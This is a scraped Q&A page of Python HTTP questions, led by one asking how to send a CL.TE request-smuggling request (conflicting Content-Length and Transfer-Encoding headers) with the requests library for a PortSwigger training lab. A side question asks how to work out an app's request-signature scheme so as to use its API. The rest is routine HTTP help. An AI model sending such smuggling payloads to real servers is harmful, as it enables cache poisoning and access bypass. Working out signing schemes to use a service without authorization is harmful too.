Can I use Python requests library to send inconsistent requests - python

I try to write a python script containing a somewhat unusual HTTP request as part of learning about web attacks and solving the lab at
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te.
There, I need to issue a request containing both a Content-Length and a Transfer-Encoding header that are in disagreement.
My basic and still unmanipulated request looks like this and works as expected:
with requests.Session() as client:
client.verify = False
client.proxies = proxies
[...]
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
client.send(prep)
[...]
Content-Length: 6\r\n
\r\n
0\r\n
\r\n
X
However, as soon as I add the Transfer-Encoding header, the request itself gets modified.
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
prep.headers['Transfer-Encoding'] = 'chunked'
client.send(prep)
The request that is actually send down the wire is
[...]
Content-Length: 0\r\n
\r\n
whereas the expected request would be
[...]
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
X
The same thing happens if I flip things around, prepare a chunked request and modify the Content-Length header afterwards:
def gen():
yield b'0\r\n'
yield b'\r\n'
yield b'X'
req = requests.Request('POST', host, data=gen())
prep = client.prepare_request(req)
prep.headers['Content-Length'] = '6'
client.send(prep)
Basically, the Transfer-Encoding header gets removed completely, the data is reinterpreted according to the chunking and the Content-Length header gets recalculated to match.
I was under the impression that preparing a request and manipulating its content before sending should send the modified content, but either this is a wrong assumption or I do things horribly wrong.
Is sending such a request possible this way or do I have to go onto a lower level to put arbitrary data on the wire?

requests is a good HTTP client, and as such will prevent you from generating bad HTTP queries. As writing bad HTTP queries will result in 400 errors in a lot of cases.
To generate syntax errors in HTTP queries you need to avoid using high level http clients (like a browser, but also like an http library). Instead you need togo down to the tcp/ip socket management (and maybe ssl also) and start writing the full HTTP protocol with your own code, no library.

Related

How is the signature in an https request encrypted?

I captured this https request from my Android phone.
GET https://picaapi.picacomic.com/init?platform=android HTTP/1.1
accept: application/vnd.picacomic.com.v1+json
time: 1579258278
nonce: b4cf4158c0da4a70b4b7e58a0b0b5a55
signature: 65448a52a6d19ceecf21d249ae25e564b61425b4d371f6a20fb4fcbbb9131d9d
app-version: 2.2.1.3.3.4
After replaying it in Fiddler for several times, it became obvious that the site checks these two values,'nonce' and 'signature', before giving a response, otherwise the response only contains an error code. Since I wanted to use this api to request for contents of the site, I need to know how these two values are encrypted.

Can HTTP 200 response have incomplete data?

I am requesting pdf binary content from a Tomcat Webserice from a Python Web Application Server.
We have implemented a 2 times retry like this in Python. Once in a while we get an HTTP 500 Response. This issue is being investigated however it is very likely to be an environment issue related to insufficient resources like maximum no: of process reached etc. In the next retry, more often than not, we get an HTTP 200 with partial blob content (i.e with EOF Marker in PDF). How is that possible?
Is there any flaws in this retry logic? How can HTTP 200 response have incomplete data is beyond my understanding. Is the HTTP 200 sent first and then the real data (which means there is a possibility of server dying after it sent HTTP 200)? The only other explanation is that server is sending the entire content but the program that is generating the data is sending incomplete data due to some resource issues which might have also caused HTTP 500.
# There is a unique id as well to make it new request. (retries is 2 by default)
while retries:
try:
req = urllib2.Request(url, data=input_html)
req.add_header('Accept', 'application/pdf')
req.add_header('Content-Type', 'text/html')
handle = urllib2.urlopen(req)
pdf_blob = handle.read()
except:
log(traceback)
retries = retries - 1
if not retries:
raise
Architecture is as follows:
Web Application -> Calls Tomcat -> Gets PDF -> Stores To DB.

Office 365 REST API (Python) Mark Email as Read

I'm sure I'm doing something simple wrong, but I can't for the life of me figure out how to set the "IsRead" property to true. It's the last step of my process that gets a filtered list of messagesa and stores and processes any attachments.
According to the docs "IsRead" is writable: http://msdn.microsoft.com/office%5Coffice365%5CAPi/complex-types-for-mail-contacts-calendar#ResourcesMessage
http://msdn.microsoft.com/office%5Coffice365%5CAPi/mail-rest-operations#MessageoperationsUpdatemessages
I'm using python 2.7 and the requests module:
# once file acquired mark the email as read
params = {'IsRead':'True'}
base_email_url = u'https://outlook.office365.com/api/v1.0/me/messages/{0}'.format( msgId )
response = requests.patch(base_email_url, params, auth=(email,pwd))
log.debug( response )
The response that comes back is this:
{"error":{"code":"ErrorInvalidRequest","message":"Cannot read the request body."}}
What's the problem with my request?
At first glance it looks OK. I wonder if the Content-Type header isn't being set to "application/json" or something along those lines. Try getting a network trace and verify that the request looks something like:
PATCH https://outlook.office365.com/api/v1.0/Me/Messages('msgid') HTTP/1.1
Accept: application/json;odata.metadata=full
Authorization: Bearer <token>
Content-Type: application/json;odata.metadata=full
Host: outlook.office365.com
Content-Length: 24
Expect: 100-continue
Connection: Keep-Alive
{
"IsRead": "true"
}
Well I have an answer for myself and it is indeed a simple matter.
It was a mistake to not fully read how PATCH is different from GET or POST.
In short it's important to make sure your headers are set for the right content-type.
Here is the working code:
# once file acquired mark the email as read
changes = {u'IsRead':u'True'}
headers = {'Content-Type': 'application/json'}
json_changes = json.dumps(changes)
base_email_url = u'https://outlook.office365.com/api/v1.0/me/messages/{0}'.format( msgId )
response = requests.patch(base_email_url, data=json_changes, auth=__AUTH, headers=headers)
log.debug( response )

How to extract JSON data from a response containing a header and body?

this is my first question posed to Stack Overflow, because typically I can find the solutions to my problem here, but for this particular situation, I cannot. I am writing a Python plugin for my compiler that outputs REST calls in various languages for interaction with an API. I am authenticating with the socket and ssl modules by sending a username and password in the request body in JSON form. Upon successful authentication, the API returns a response in the following format with important response data in the body:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Tue, 05 Feb 2013 03:36:18 GMT
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST,OPTIONS,GET
Access-Control-Allow-Headers: Content-Type
Server: Restlet-Framework/2.0m5
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 94
{"authentication-token":"<token>","authentication-secret":"<secret>"}
This is probably a very elementary question for Pythonistas, given its powerful tools for String manipulation. But alas, I am a new programmer who started with Java. I would like to know what would be the best way to parse this entire response to obtain the "<token>" and "<secret>"? Should I use a search for a "{" and dump the substring into a json object? My intuition is telling me to try and use the re module, but I cannot seem to figure out how it would be used in this situation, since the pattern of the token and secret are obviously not predictable. Because I have opted to authenticate with a low-level module set, this response is one big String obtained by constructing the header and appending JSON data to it in the body, then executing the request and obtaining the response with the following code:
#Socket configuration and connection execution
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = ssl.wrap_socket(sock, ca_certs = pem_file)
conn.connect((host, port))
conn.send(req)
response = conn.recv()
print(response)
The print statement outputs the first code sample. Any help or insight would be greatly appreciated!
HTTP headers are split from the rest of the body by a \r\n\r\n sequence. Do something like:
import json
...
(headers, js) = response.split("\r\n\r\n")
data = json.loads(js)
token = data["authentication-token"]
secret = data["authentication-secret"]
You'll probably want to check the response, etc, and various libraries (e.g. requests) can do all of this a whole lot easier for you.

python: HTTP PUT with unencoded binary data

I cannot for the life of me figure out how to perform an HTTP PUT request with verbatim binary data in Python 2.7 with the standard Python libraries.
I thought I could do it with urllib2, but that fails because urllib2.Request expects its data in application/x-www-form-urlencoded format. I do not want to encode the binary data, I just want to transmit it verbatim, after the headers that include
Content-Type: application/octet-stream
Content-Length: (whatever my binary data length is)
This seems so simple, but I keep going round in circles and can't seem to figure out how.
How can I do this? (aside from open up a raw binary socket and write to it)
I found out my problem. It seems there is some obscure behavior in urllib2.Request / urllib2.urlopen() (at least in Python 2.7)
The urllib2.Request(url, data, headers) constructor seems to expect the same type of string in its url and data parameters.
I was giving the data parameter raw data from a file read() call (which in Python 2.7 returns it in the form of a 'plain' string), but my url was accidentally Unicode because I concatenated a portion of the URL from the result of another function which returned Unicode strings.
Rather than trying to "downcast" url from Unicode -> plain strings, it tried to "upcast" the data parameter to Unicode, and it gave me a codec error. (oddly enough, this happens on the urllib2.urlopen() function call, not the urllib2.Request constructor)
When I changed my function call to
# headers contains `{'Content-Type': 'application/octet-stream'}`
r = urllib2.Request(url.encode('utf-8'), data, headers)
it worked fine.
You're misreading the documentation: urllib2.Request expects the data already encoded, and for POST that usually means the application/x-www-form-urlencoded format. You are free to associate any other, binary data, like this:
import urllib2
data = b'binary-data'
r = urllib2.Request('http://example.net/put', data,
{'Content-Type': 'application/octet-stream'})
r.get_method = lambda: 'PUT'
urllib2.urlopen(r)
This will produce the request you want:
PUT /put HTTP/1.1
Accept-Encoding: identity
Content-Length: 11
Host: example.net
Content-Type: application/octet-stream
Connection: close
User-Agent: Python-urllib/2.7
binary-data
Have you considered/tried using httplib?
HTTPConnection.request(method, url[, body[, headers]])
This will send a request to the server using the HTTP request method
method and the selector url. If the body argument is present, it
should be a string of data to send after the headers are finished.
Alternatively, it may be an open file object, in which case the
contents of the file is sent; this file object should support fileno()
and read() methods. The header Content-Length is automatically set to
the correct value. The headers argument should be a mapping of extra
HTTP headers to send with the request.
This snipped worked for me to PUT an image:
on HTTPS site. If you don't need HTTPS, use
httplib.HTTPConnection(URL) instead.
import httplib
import ssl
API_URL="api-mysight.com"
TOKEN="myDummyToken"
IMAGE_FILE="myimage.jpg"
imageID="myImageID"
URL_PATH_2_USE="/My/image/" + imageID +"?objectId=AAA"
headers = {"Content-Type":"application/octet-stream", "X-Access-Token": TOKEN}
imgData = open(IMAGE_FILE, "rb")
REQUEST="PUT"
conn = httplib.HTTPSConnection(API_URL, context=ssl.SSLContext(ssl.PROTOCOL_TLSv1))
conn.request(REQUEST, URL_PATH_2_USE, imgData, headers)
response = conn.getresponse()
result = response.read()

Categories